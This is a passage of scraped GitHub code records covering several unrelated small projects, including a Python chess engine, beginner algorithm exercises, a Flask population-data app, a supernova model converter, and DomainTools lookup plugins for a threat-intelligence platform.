self.board[row+1][col+1][0] != 'w':\n legal_moves.append(Move((row, col), (row+1, col+1), self.board))\n except:\n pass\n\n def get_king_moves(self, row, col, legal_moves):\n king_moves = ((-1, -1), (1, 1), (0, 1), (1, 0), (0, -1), (-1, 0), (1, -1), (-1, 1))\n ally_color = 'w' if self.white_to_move else 'b'\n for i in range(8):\n end_row = row + king_moves[i][0]\n end_col = col + king_moves[i][1]\n if 0 <= end_row <= 7 and 0 <= end_col <= 7:\n end_piece = self.board[end_row][end_col]\n if end_piece[0] != ally_color:\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n\n def get_rook_moves(self, row, col, legal_moves):\n directions = ((-1, 0), (0, 1), (1, 0), (0, -1))\n ally_color = 'w' if self.white_to_move else 'b'\n for i in range(4):\n for j in range(1, 8):\n end_row = row + directions[i][0] * j\n end_col = col + directions[i][1] * j\n if 0 <= end_row <= 7 and 0 <= end_col <= 7:\n end_piece = self.board[end_row][end_col]\n if end_piece == '--':\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n else:\n if end_piece[0] == ally_color:\n break\n elif end_piece[0] != ally_color:\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n break\n else: \n break\n\n def get_bishop_moves(self, row, col, legal_moves):\n directions = ((-1, 1), (1, 1), (1, -1), (-1, -1))\n ally_color = 'w' if self.white_to_move else 'b'\n for i in range(4):\n for j in range(1, 8):\n end_row = row + directions[i][0] * j\n end_col = col + directions[i][1] * j\n if 0 <= end_row <= 7 and 0 <= end_col <= 7:\n end_piece = self.board[end_row][end_col]\n if end_piece == '--':\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n else:\n if end_piece[0] == ally_color:\n break\n elif end_piece[0] != ally_color:\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n break\n else: \n break\n\n def get_queen_moves(self, row, col, legal_moves):\n directions = ((-1, 0), (0, 1), (1, 0), (0, -1), (-1, 1), (1, 1), (1, -1), (-1, -1))\n ally_color = 'w' if self.white_to_move else 'b'\n for i in range(8):\n for j in range(1, 8):\n end_row = row + directions[i][0] * j\n end_col = col + directions[i][1] * j\n if 0 <= end_row <= 7 and 0 <= end_col <= 7:\n end_piece = self.board[end_row][end_col]\n if end_piece == '--':\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n else:\n if end_piece[0] == ally_color:\n break\n elif end_piece[0] != ally_color:\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n break\n else: \n break\n\n def get_knight_moves(self, row, col, legal_moves):\n knight_moves = ((1, 2), (1, -2), (-1, -2), (-1, 2), (2, 1), (2, -1), (-2, -1), (-2, 1))\n ally_color = 'w' if self.white_to_move else 'b'\n for i in range(8):\n end_row = row + knight_moves[i][0]\n end_col = col + knight_moves[i][1]\n if 0 <= end_row <= 7 and 0 <= end_col <= 7:\n end_piece = self.board[end_row][end_col]\n if end_piece[0] != ally_color:\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n \n\n \nclass Move():\n ranks_to_rows = {'1':7, '2':6, '3':5, '4':4,\n '5':3, '6':2, '7':1, '8':0}\n rows_to_ranks = {v:k for k,v in ranks_to_rows.items()}\n\n files_to_cols = {'a':0, 'b':1, 'c':2, 'd':3,\n 'e':4, 'f':5, 'g':6, 'h':7}\n cols_to_files = {v:k for k,v in files_to_cols.items()}\n\n '''\n Initial state of a move\n '''\n def __init__(self, start_square, end_square, board):\n self.start_row = start_square[0]\n self.start_col = start_square[1]\n self.end_row = end_square[0]\n self.end_col = end_square[1]\n self.piece_moved = board[self.start_row][self.start_col]\n self.piece_captured = board[self.end_row][self.end_col]\n self.move_id = self.start_row * 1000 + self.start_col * 100 + self.end_row * 10 + self.end_col\n\n '''\n Overwrites equal instances\n '''\n def __eq__(self, other):\n if isinstance(other, Move):\n return self.move_id == other.move_id\n return False\n\n '''\n Gets the actual chess notation\n '''\n def get_chess_notation(self, row, col):\n line = self.cols_to_files[col]\n rank = self.rows_to_ranks[row]\n if self.piece_captured != '--':\n return self.piece_moved + 'x' + line + rank\n else:\n return self.piece_moved + line + rank\n\n \n\n\n\n","repo_name":"MartinSpiguel/Chess_game","sub_path":"chess_engine.py","file_name":"chess_engine.py","file_ext":"py","file_size_in_byte":11381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73023471412","text":"from RecursiveShadowCasting import Fov_RSC\n\nwidth = 9\nheight = 9\nfov = Fov_RSC(width, height)\ntestmap = [[True for y in range(height)] for x in range(width)]\nfor y in range(height):\n for x in range(width):\n if x == 0 or y == 0 or x == width - 1 or y == height - 1:\n testmap[x][y] = False\nresult = fov.Calculate_Sight(testmap, 4, 4, 4)\ns = ''\nfor y in range(height):\n for x in range(width):\n if result[x][y]:\n if testmap[x][y]:\n s += '.'\n else:\n s += '#'\n else:\n s += '▒'\n s += '\\n'\nprint(s)\n","repo_name":"Akhier/Py-RecursiveShadowCasting","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37223927098","text":"from sklearn.ensemble import RandomForestClassifier\nrandom_forest = RandomForestClassifier(n_estimators = 100) \nrandom_forest.fit(X_train, Y_train)\nprint(random_forest.score(X_train, Y_train))\nprint(random_forest.score(X_test, Y_test))\n\nimport xgboost as xgb\nboosting_model = xgb.XGBClassifier(n_estimators = 100)\nboosting_model.fit(X_train, Y_train) # 학습\nprint(boosting_model.score(X_train, Y_train))\nprint(boosting_model.score(X_test, Y_test))","repo_name":"badjiyoon/da_study","sub_path":"KiYoung/ch5_4.py","file_name":"ch5_4.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2366850609","text":"from collections import deque\n#스택이용- 재귀 이용\ndef dfs(graph, v, visited):\n visited[v]=True #방문한 노드를 true로 변경\n print(v,end=' ')\n for i in graph[v]:\n if not visited[i]:\n dfs(graph,i,visited)\n \n\ngraph = [\n [],\n [2,3,8],\n [1,7],\n [1,4,5],\n [3,5],\n [3,4],\n [7],\n [2,6,8],\n [1,7]\n]\n\nvisited = [False]*9\ndfs(graph,1,visited)","repo_name":"heekyoung2000/jungle-algorithm","sub_path":"third/DFS/DFSpra.py","file_name":"DFSpra.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41859749360","text":"import prettytable\n\nfrom pr_publisher.publishers.base import BasePublisher\n\n\nclass TablePublisher(BasePublisher):\n \"\"\"Prints pull requests in a table format to stdout\"\"\"\n\n def publish(self, publish_entries):\n fields = [\n \"reviews\",\n \"merge state\",\n \"action needed\",\n \"title\",\n \"created\",\n \"updated\",\n \"days since update\",\n \"link\",\n ]\n\n if self.args.show_labels:\n fields.append('labels')\n\n table = prettytable.PrettyTable(field_names=fields)\n\n for entry in publish_entries:\n row = [\n \"✓\" * entry.approval_count + \"✗\" * entry.request_changes_count,\n entry.mergeable_state,\n entry.action_string,\n entry.pr.title,\n entry.pr.created_at.date(),\n entry.pr.updated_at.date(),\n round(entry.age_since_update_in_days),\n entry.pr.html_url,\n ]\n if self.args.show_labels:\n label_names = ' '.join(entry.label_names) if entry.label_names else ''\n row.append(label_names)\n\n table.add_row(row)\n print(table)\n","repo_name":"pglass/pr-publisher","sub_path":"pr_publisher/publishers/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23481360099","text":"import sys\nclass Solution(object):\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n if not prices:\n return 0\n\n maxx = -sys.maxint\n start = prices[0]\n end = 0\n for i in range(1, len(prices)):\n end = prices[i]\n maxx = max(maxx, end - start)\n start = min(start, end)\n return 0 if maxx < 0 else maxx\n","repo_name":"ynyeh0221/LeetCode","sub_path":"121. Best Time to Buy and Sell Stock.py","file_name":"121. Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"2822899758","text":"\"\"\"\n Bir aracın km cinsinden gittiği yol bilgisini mil olarak yazdırınız.\n mil = km / 1.609344\n\"\"\"\nprint(\"kaç km yol gittiniz?\")\nmesafeKm = input()\nmesafeMil = float(mesafeKm) / 1.609344\nmesafeMil = round(mesafeMil, 2)\n\nprint(str(mesafeKm) + \" km = \" + str(mesafeMil) + \" mil.\")","repo_name":"mhoproje/MHarunAydeniz-pythoncalisma","sub_path":"data-types.py","file_name":"data-types.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7770963854","text":"\"\"\" 9. Procedimento que atualiza e/ou inclui o número no vetor \nde elementos se o número já foi encontrado ou não. \"\"\"\nimport numpy as np\n\ndef contaValor(matriz):\n print(matriz, '\\n')\n contador = {}\n for l in matriz:\n for c in l:\n if np.sum(matriz==c)>1:\n contador[c] = np.sum(matriz==c)\n for numero in contador:\n qtd = contador[numero]\n print(f'o valor {numero} repetiu {qtd}', end= ', ')\n print('\\n')\n\n\nmatriz_teste = np.array([[1,2,3,4,5],[6,7,8,9,10],[11,12,13,14,15],[16,17,18,19,20],[21,22,23,24,25],[26,27,28,29,30],[31,32,33,34,35],[36,37,38,39,40],[41,42,43,44,45],[1,2,3,4,5]])\ncontaValor(matriz_teste)","repo_name":"MateusFagunddes/python_logica","sub_path":"lista 5/exc17.py","file_name":"exc17.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9718327398","text":"import yaml\nfrom rkinf.cluster import start_cluster, stop_cluster\nfrom rkinf.log import setup_logging\nfrom rkinf.toolbox import (fastqc, cutadapt_tool, novoindex, novoalign,\n htseq_count)\nfrom bcbio.utils import safe_makedir\nimport sys\nimport os\n\nMAX_READ_LENGTH = 10000\n\n\ndef _get_stage_config(config, stage):\n return config[\"stage\"][stage]\n\n\ndef _get_program(config, stage):\n return config[\"stage\"][stage][\"program\"]\n\n\ndef main(config_file):\n with open(config_file) as in_handle:\n config = yaml.load(in_handle)\n setup_logging(config)\n from rkinf.log import logger\n start_cluster(config)\n\n from rkinf.cluster import view\n input_files = [os.path.join(config[\"dir\"][\"data\"], x) for x in\n config[\"input\"]]\n results_dir = config[\"dir\"][\"results\"]\n\n map(safe_makedir, config[\"dir\"].values())\n\n curr_files = input_files\n\n for stage in config[\"run\"]:\n if stage == \"fastqc\":\n nfiles = len(curr_files)\n logger.info(\"Running %s on %s\" % (stage, str(curr_files)))\n fastqc_config = _get_stage_config(config, stage)\n fastqc_outputs = view.map(fastqc.run, curr_files,\n [fastqc_config] * nfiles,\n [config] * nfiles)\n\n if stage == \"cutadapt\":\n nfiles = len(curr_files)\n cutadapt_config = _get_stage_config(config, stage)\n cutadapt_outputs = view.map(cutadapt_tool.run,\n curr_files,\n [cutadapt_config] * nfiles,\n [config] * nfiles)\n curr_files = cutadapt_outputs\n\n if stage == \"novoalign\":\n nfiles = len(curr_files)\n novoalign_config = _get_stage_config(config, stage)\n #db = novoindex.run(config[\"ref\"],\n # _get_stage_config(config, \"novoindex\"),\n # config)\n db = config[\"genome\"][\"file\"]\n novoalign_outputs = view.map(novoalign.run, curr_files,\n [db] * nfiles,\n [novoalign_config] * nfiles,\n [config] * nfiles)\n curr_files = novoalign_outputs\n\n if stage == \"htseq-count\":\n nfiles = len(curr_files)\n htseq_config = _get_stage_config(config, stage)\n htseq_outputs = view.map(htseq_count.run_with_config,\n curr_files,\n [config] * nfiles,\n [stage] * nfiles)\n combined_out = htseq_count.combine_counts(htseq_outputs,\n \"combined.counts\")\n\n stop_cluster()\n\n\nif __name__ == \"__main__\":\n main(*sys.argv[1:])\n","repo_name":"parveezsha/gitlabjuly","sub_path":"projects/slim_rnaseq/scripts/slim.py","file_name":"slim.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35664865055","text":"T = int(input())\nfor tc in range(1, T + 1):\n P = int(input())\n raw = list(map(int, input().split()))\n maxNum = max(raw)\n for n in raw:\n result = maxNum * n\n for x in raw:\n q, r = divmod(result, x)\n if r or q not in raw:\n break\n else:\n break\n print(\"#{} {}\".format(tc, result))\n","repo_name":"gogumasitda/TIL","sub_path":"algorithm/0627/보물왕태혁.py","file_name":"보물왕태혁.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"34436191332","text":"# flask dependencies\nfrom flask import Flask\nfrom flask import render_template \nfrom flask import jsonify\n\n# sql alchemy dependencies\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\n\n# Define the database connection parameters\nimport config\n# get username and password from config.py\nusername = config.username\npassword = config.password \n#username = \"postgres\"\n#password = \"postgres\"\n\n### define database variable \ndatabase_name = 'Population' # Created in Week 9, Night 1, Exercise 08-Stu_CRUD \nconnection_string = f'postgresql://{username}:{password}@localhost:5432/{database_name}'\n\n\n# Connect to the database\nengine = create_engine(connection_string)\n\n# reflect an existing database into a new model\nbase = automap_base()\n\n# reflect the tables\nbase.prepare(engine, reflect=True)\n\n# Save reference to the table\n### update table name\n#table = base.classes.tablename\nun_sex_population = base.classes.un_sex_population\nyoung_to_elder = base.classes.young_to_elder\n\n# Flask Setup\n# Instantiate the Flask application\napp = Flask(__name__)\n\n##### look into page caching\n# disable page caching\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n\n# flask app routes\n# index.html route\n@app.route(\"/\")\ndef IndexRoute():\n ''' This function runs when the browser loads the index route. \n Note that the html file must be located in a folder called templates. '''\n\n webpage = render_template(\"index.html\")\n return webpage\n\n# route to query database for population pyramid \n@app.route(\"/pop_pyramid_data\")\ndef QuerySexPopulation():\n ''' Query the database for population numbers and return the results as a JSON. '''\n\n # Open a session, run the query, and then close the session again\n session = Session(engine)\n #### EXAMPLE RESULTS QUERY BELOW\n #results = session.query(table.country, table.iso3, table.totalpopulation).all()\n ###########\n results = session.query(un_sex_population.r_0_4, \n un_sex_population.r_5_9,\n un_sex_population.r_10_14,\n un_sex_population.r_15_19,\n un_sex_population.r_20_24,\n un_sex_population.r_25_29,\n un_sex_population.r_30_34,\n un_sex_population.r_35_39,\n un_sex_population.r_40_44,\n un_sex_population.r_45_49,\n un_sex_population.r_50_54,\n un_sex_population.r_55_59,\n un_sex_population.r_60_64,\n un_sex_population.r_65_69,\n un_sex_population.r_70_74,\n un_sex_population.r_75_79,\n un_sex_population.r_80_84,\n un_sex_population.r_85_89,\n un_sex_population.r_90_94,\n un_sex_population.r_95_99,\n un_sex_population.r_100_105).all()\n session.close \n\n ###########\n #EXAMPLE DIC LIST BELOW\n ###########\n\n # Create a list of dictionaries, with each dictionary containing one row from the query. \n # all_population = []\n # for country, iso3, totalpopulation in results:\n # dict = {}\n # dict[\"country\"] = country\n # dict[\"iso3\"] = iso3\n # dict[\"totalpopulation\"] = totalpopulation\n # all_population.append(dict)\n\n ###########\n sex_population = []\n for r_0_4, r_5_9, r_10_14, r_15_19, r_20_24, r_25_29, r_30_34, r_35_39, r_40_44, r_45_49, r_50_54, r_55_59, r_60_64, r_65_69, r_70_74, r_75_79, r_80_84, r_85_89, r_90_94, r_95_99, r_100_105 in results:\n dict = {}\n\n dict[\"r_0_4\"] = r_0_4\n dict[\"r_5_9\"] = r_5_9 \n dict[\"r_10_14\"] = r_10_14\n dict[\"r_15_19\"] = r_15_19\n dict[\"r_20_24\"] = r_20_24\n dict[\"r_25_29\"] = r_25_29\n dict[\"r_30_34\"] = r_30_34\n dict[\"r_35_39\"] = r_35_39\n dict[\"r_40_44\"] = r_40_44\n dict[\"r_45_49\"] = r_45_49\n dict[\"r_50_54\"] = r_50_54\n dict[\"r_55_59\"] = r_55_59\n dict[\"r_60_64\"] = r_60_64\n dict[\"r_65_69\"] = r_65_69\n dict[\"r_70_74\"] = r_70_74\n dict[\"r_75_79\"] = r_75_79\n dict[\"r_80_84\"] = r_80_84\n dict[\"r_85_89\"] = r_85_89\n dict[\"r_90_94\"] = r_90_94\n dict[\"r_95_99\"] = r_95_99\n dict[\"r_100_105\"] = r_100_105\n \n sex_population.append(dict)\n\n # Return the jsonified result. \n return jsonify(sex_population)\n\n@app.route(\"/age_stacked_area_data\")\ndef QueryAgePopulation():\n ''' Query the database for population numbers and return the results as a JSON. '''\n\n # Open a session, run the query, and then close the session again\n session = Session(engine)\n #### EXAMPLE RESULTS QUERY BELOW\n #results = session.query(table.country, table.iso3, table.totalpopulation).all()\n ###########\n\n results = session.query(young_to_elder.Country, \n young_to_elder.Year, \n young_to_elder.Young, \n young_to_elder.Working_Age, \n young_to_elder.Elder).all()\n session.close \n\n age_population = []\n for Country, Year, Young, Working_Age, Elder in results:\n dict = {}\n dict[\"Country\"] = Country\n dict[\"Young\"] = Young\n dict[\"Working_Age\"] = Working_Age\n dict[\"Elder\"] = Elder\n age_population.append(dict)\n\n # Return the jsonified result. \n return jsonify(age_population)\n\n# This statement is required for Flask to do its job. \n# Think of it as chocolate cake recipe. \nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"anikajohnson/Project-2-US-Pop","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1796476630","text":"# -*- coding: utf-8 -*-\n\"\"\"\nsnewpy.scripts.to_snowglobes\n============================\n\nConvert an arbitrary model to SNOwGLoBES format. Based on SNEWPY.py script by\nE. O'Connor and J. P. Kneller.\n\nThis version will subsample the times in a supernova model, produce energy\ntables expected by SNOwGLoBES, and compress the output into a tarfile.\n\"\"\"\n\nimport numpy as np\nfrom argparse import ArgumentParser\n\nimport os\nimport io\nimport tarfile\n\nimport logging\n\nfrom snewpy.models import *\nfrom snewpy.flavor_transformation import *\n\ndef main(options=None):\n # Parse command-line arguments.\n p = ArgumentParser(description='Convert to SNOwGLoBES format.')\n p.add_argument('infile', nargs=1,\n help='Supernova model input file (Nakazato only).')\n p.add_argument('-o', '--output', default=None,\n help='Output tarfile name (if customization desired)')\n\n tbingroup = p.add_mutually_exclusive_group()\n tbingroup.add_argument('-n', '--ntbins', type=int,\n help='Number of bins used to sample model')\n tbingroup.add_argument('-t', '--deltat', type=float,\n help='Time binning used to sample model [sec]')\n\n p.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Activate verbose log for debugging')\n\n if options is None:\n args = p.parse_args()\n else:\n args = p.parse_args(options)\n\n # Set verbosity of the log.\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n\n # Load up the model. To do: support more than Nakazato format.\n infile = args.infile[0]\n snmodel = Nakazato2013(infile, NoTransformation())\n\n # Subsample the model time. Default to 30 time slices.\n tmin = snmodel.get_time()[0]\n tmax = snmodel.get_time()[-1]\n if args.deltat is not None:\n dt = args.deltat\n elif args.ntbins is not None:\n dt = (tmax - tmin) / (args.ntbins+1)\n else:\n dt = (tmax - tmin) / 31\n\n tedges = np.arange(tmin, tmax, dt)\n times = 0.5*(tedges[1:] + tedges[:-1])\n\n # Generate output.\n if args.output is not None:\n tfname = args.output\n else:\n tfname = infile.replace('.fits', '.SNOformat.tar.bz2')\n\n with tarfile.open(tfname, 'w:bz2') as tf:\n d = 10. *1000.*3.086e+18 # luminosity to fluence\n keV = 1e3 * 1.60218e-12 # eV to erg\n MeV = 1e6 * 1.60218e-12\n GeV = 1e9 * 1.60218e-12\n\n energy = np.linspace(0, 100, 501) * MeV\n\n # Loop over sampled times.\n for i, t in enumerate(times):\n osc_spectra = snmodel.get_oscillatedspectra(t, energy)\n osc_fluence = {}\n table = []\n\n table.append('# TBinMid={:g}sec@(tBinWidth={:g}s)(eBinWidth=0.2MeV) Fluence in Number Neutrinos per cm^2'.format(t, dt))\n table.append('# E(GeV) NuE NuMu NuTau aNuE aNuMu aNuTau')\n\n # Generate energy + number flux table.\n for j, E in enumerate(energy):\n for flavor in Flavor:\n osc_fluence[flavor] = osc_spectra[flavor][j] * dt * 200.*keV / (4.*np.pi*d**2)\n \n s = '{:17.8E}'.format(E/GeV)\n s = '{}{:17.8E}'.format(s, osc_fluence[Flavor.nu_e])\n s = '{}{:17.8E}'.format(s, osc_fluence[Flavor.nu_x]/2)\n s = '{}{:17.8E}'.format(s, osc_fluence[Flavor.nu_x]/2)\n s = '{}{:17.8E}'.format(s, osc_fluence[Flavor.nu_e_bar])\n s = '{}{:17.8E}'.format(s, osc_fluence[Flavor.nu_x_bar]/2)\n s = '{}{:17.8E}'.format(s, osc_fluence[Flavor.nu_x_bar]/2)\n table.append(s)\n logging.debug(s)\n\n # Encode energy/flux table and output to file in tar archive.\n output = '\\n'.join(table).encode('ascii')\n\n infoname = '{:02d}Tbins/{}-tbin{:02d}.NoOsc.dat'.format(\n len(times),\n os.path.basename(infile).replace('.fits', ''),\n i + 1)\n info = tarfile.TarInfo(name=infoname)\n info.size = len(output)\n\n logging.info('Time {:g} s; writing {} to {}'.format(t, infoname, tfname))\n tf.addfile(info, io.BytesIO(output))\n\n","repo_name":"SNEWS2/snewpy","sub_path":"python/snewpy/scripts/old_to_snowglobes.py","file_name":"old_to_snowglobes.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"21"} +{"seq_id":"42344664903","text":"import hashlib\nimport hmac\nimport json\nimport ssl\nfrom datetime import datetime\n\nimport requests\n\n# from pythonwhois.parse import parse_raw_whois\nfrom mongoengine import FieldDoesNotExist\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.poolmanager import PoolManager\n\nfrom core.analytics import OneShotAnalytics\nfrom core.common.utils import tldextract_parser\nfrom core.config.config import yeti_config\nfrom core.entities import Company\nfrom core.helpers import iterify, get_value_at\nfrom core.observables import Hostname, Email, Text\n\n\ndef link_from_data(observable, data, path, klass, description):\n data = get_value_at(data, path)\n\n if data is None:\n return []\n\n links = set()\n\n for value in iterify(data):\n try:\n node = klass.get_or_create(value=value)\n except FieldDoesNotExist:\n node = klass.get_or_create(name=value)\n\n links.update(observable.active_link_to(node, description, \"DomainTools\"))\n\n return list(links)\n\n\nclass TlsAdapter(HTTPAdapter):\n def init_poolmanager(self, connections, maxsize, block=False):\n self.poolmanager = PoolManager(\n num_pools=connections,\n maxsize=maxsize,\n block=block,\n ssl_version=ssl.PROTOCOL_TLSv1_2,\n )\n\n\nclass DomainToolsApi(object):\n settings = {\n \"domaintools_api_username\": {\n \"name\": \"DomainTools API Username\",\n \"description\": \"Username provided for API by DomainTools.\",\n },\n \"domaintools_api_key\": {\n \"name\": \"DomainTools API Key\",\n \"description\": \"API Key provided by DomainTools.\",\n },\n }\n\n API_URL = \"https://api.domaintools.com/v1\"\n\n @staticmethod\n def get(uri, settings, params={}):\n timestamp = datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n _params = \"{}{}/v1{}\".format(\n settings[\"domaintools_api_username\"].encode(\"ascii\"), timestamp, uri\n )\n signature = hmac.new(\n settings[\"domaintools_api_key\"].encode(\"ascii\"),\n _params,\n digestmod=hashlib.sha1,\n ).hexdigest()\n _params = {\n \"api_username\": settings[\"domaintools_api_username\"],\n \"signature\": signature,\n \"timestamp\": timestamp,\n }\n params.update(_params)\n\n s = requests.Session(proxies=yeti_config.proxy)\n s.mount(\"https://\", TlsAdapter())\n r = s.get(DomainToolsApi.API_URL + uri, params=params)\n r = r.json()\n\n if \"error\" in r:\n raise LookupError(r[\"error\"][\"message\"])\n\n return r\n\n\nclass DTReverseIP(OneShotAnalytics, DomainToolsApi):\n default_values = {\n \"group\": \"DomainTools\",\n \"name\": \"Reverse IP\",\n \"description\": \"Reverse IP lookup.\",\n }\n\n ACTS_ON = [\"Ip\"]\n\n @staticmethod\n def analyze(observable, results):\n links = set()\n\n data = DomainToolsApi.get(\n \"/{}/host-domains/\".format(observable.value), results.settings\n )\n results.update(raw=json.dumps(data, indent=2))\n\n for record in data[\"response\"][\"ip_addresses\"][\"domain_names\"]:\n node = Hostname.get_or_create(value=record)\n links.update(node.active_link_to(observable, \"A record\", \"DomainTools\"))\n\n return list(links)\n\n\nclass DTReverseNS(OneShotAnalytics, DomainToolsApi):\n default_values = {\n \"group\": \"DomainTools\",\n \"name\": \"DomanTools Reverse NS\",\n \"description\": \"Reverse Name Server lookup.\",\n }\n\n ACTS_ON = [\"Hostname\"]\n\n @staticmethod\n def analyze(observable, results):\n links = set()\n\n data = DomainToolsApi.get(\n \"/{}/name-server-domains\".format(observable.value), results.settings\n )\n results.update(raw=json.dumps(data, indent=2))\n\n for record in (\n data[\"response\"][\"primary_domains\"] + data[\"response\"][\"secondary_domains\"]\n ):\n node = Hostname.get_or_create(value=record)\n links.update(node.active_link_to(observable, \"NS record\", \"DomainTools\"))\n\n return list(links)\n\n\nclass DTWhoisHistory(OneShotAnalytics, DomainToolsApi):\n default_values = {\n \"group\": \"DomainTools\",\n \"name\": \"Whois History\",\n \"description\": \"Whois History lookup.\",\n }\n\n ACTS_ON = [\"Hostname\"]\n\n @staticmethod\n def analyze(observable, results):\n links = set()\n parts = tldextract_parser(observable.value)\n\n if parts.subdomain == \"\":\n data = DomainToolsApi.get(\n \"/{}/whois/history\".format(observable.value), results.settings\n )\n results.update(raw=json.dumps(data, indent=2))\n\n for record in data[\"response\"][\"history\"]:\n created = datetime.strptime(\n record[\"whois\"][\"registration\"][\"created\"], \"%Y-%m-%d\"\n )\n expires = datetime.strptime(\n record[\"whois\"][\"registration\"][\"expires\"], \"%Y-%m-%d\"\n )\n\n registrar = Company.get_or_create(\n name=record[\"whois\"][\"registration\"][\"registrar\"]\n )\n registrant = Text.get_or_create(value=record[\"whois\"][\"registrant\"])\n\n links.update(\n observable.link_to(\n registrar, \"Registrar\", \"DomainTools\", created, expires\n )\n )\n links.update(\n observable.link_to(\n registrant, \"Registrant\", \"DomainTools\", created, expires\n )\n )\n\n parsed = parse_raw_whois([record[\"whois\"][\"record\"]], normalized=True)\n email = get_value_at(parsed, \"contacts.registrant.email\")\n if email:\n email = Email.get_or_create(value=email)\n links.update(\n observable.link_to(\n email, \"Registrant Email\", \"DomainTools\", created, expires\n )\n )\n\n return list(links)\n\n\nclass DTReverseWhois(OneShotAnalytics, DomainToolsApi):\n default_values = {\n \"group\": \"DomainTools\",\n \"name\": \"DomainTools Reverse Whois\",\n \"description\": \"Reverse Whois lookup.\",\n }\n\n ACTS_ON = [\"Text\", \"Email\"]\n\n @staticmethod\n def analyze(observable, results):\n links = []\n\n params = {\"terms\": observable.value, \"mode\": \"purchase\"}\n data = DomainToolsApi.get(\"/reverse-whois/\", results.settings, params)\n\n for domain in data[\"response\"][\"domains\"]:\n node = Hostname.get_or_create(value=domain)\n links += node.active_link_to(\n observable, \"Registrant Information\", \"DomainTools\"\n )\n\n return links\n\n\nclass DTWhois(OneShotAnalytics, DomainToolsApi):\n default_values = {\n \"group\": \"DomainTools\",\n \"name\": \"DomainTools Whois\",\n \"description\": \"Whois lookup with parsed results.\",\n }\n\n ACTS_ON = [\"Hostname\", \"Ip\"]\n\n @staticmethod\n def analyze_domain(observable, data):\n fields = [\n (\n \"response.parsed_whois.contacts.registrant.email\",\n Email,\n \"Registrant Email\",\n ),\n (\"response.parsed_whois.contacts.registrant.name\", Text, \"Registrant Name\"),\n (\n \"response.parsed_whois.contacts.registrant.org\",\n Text,\n \"Registrant Organization\",\n ),\n (\n \"response.parsed_whois.contacts.registrant.phone\",\n Text,\n \"Registrant Phone Number\",\n ),\n (\"response.parsed_whois.name_servers\", Hostname, \"NS record\"),\n ]\n\n links = []\n\n for field in fields:\n links += link_from_data(observable, data, *field)\n\n return links\n\n @staticmethod\n def analyze_ip(observable, data):\n return link_from_data(\n observable, data, \"response.registrant\", Company, \"Hosting\"\n )\n\n @staticmethod\n def analyze(observable, results):\n links = []\n parts = tldextract_parser(observable.value)\n\n if parts.subdomain == \"\":\n should_add_context = False\n for context in observable.context:\n if context[\"source\"] == \"whois\":\n break\n else:\n should_add_context = True\n context = {\"source\": \"whois\"}\n\n data = DomainToolsApi.get(\n \"/{}/whois/parsed\".format(observable.value), results.settings\n )\n results.update(raw=json.dumps(data, indent=2))\n context[\"raw\"] = data[\"response\"][\"whois\"]\n\n if isinstance(observable, Hostname):\n links = DTWhois.analyze_domain(observable, data)\n else:\n links = DTWhois.analyze_ip(observable, data)\n\n if should_add_context:\n observable.add_context(context)\n else:\n observable.save()\n\n print(links)\n\n return links\n","repo_name":"yeti-platform/yeti","sub_path":"plugins/analytics/public/domain_tools.py","file_name":"domain_tools.py","file_ext":"py","file_size_in_byte":9192,"program_lang":"python","lang":"en","doc_type":"code","stars":1485,"dataset":"github-code","pt":"21"} +{"seq_id":"20053788911","text":"import pytest\n\n\nfrom truck import Truck\n\ndef test_apply_brakes_when_truck_object_is_in_motion_returns_current_speed(truck):\n # Arrange\n truck.start_engine()\n truck.accelerate()\n truck.accelerate()\n current_speed = 70\n\n # Act\n truck.apply_brakes()\n\n # Assert\n assert truck.current_speed == current_speed\n\n@pytest.mark.parametrize(\n \"\"\"color, max_speed, acceleration, tyre_friction,\n max_cargo_weight, 